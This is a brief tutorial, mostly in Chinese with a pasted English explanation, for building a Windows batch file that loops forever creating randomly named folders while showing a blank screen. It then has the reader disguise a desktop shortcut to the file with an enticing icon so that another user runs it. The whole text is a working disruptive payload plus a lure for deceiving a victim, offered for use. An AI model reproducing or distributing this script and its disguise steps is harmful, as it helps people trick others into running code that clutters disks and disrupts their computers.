操作方法
创建一个记事本。
这段代码复制到记事本: As usual open notepad. Copy this code to Notepad. @echo off :top md %random% goto top @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder. md %random% is command that creating folders with random names. goto top – return to label :top , infinite loop
将文件保存为(如:Dveil.bat)
将bat文件复制到任意盘符。推荐C盘:
创建快捷方式到桌面上(通过右键单击并发送到桌面)。
现在到桌面,然后右键单击该快捷方式,选择属性,单击更改图标;
选择将吸引用户的任何图标,然后单击确定。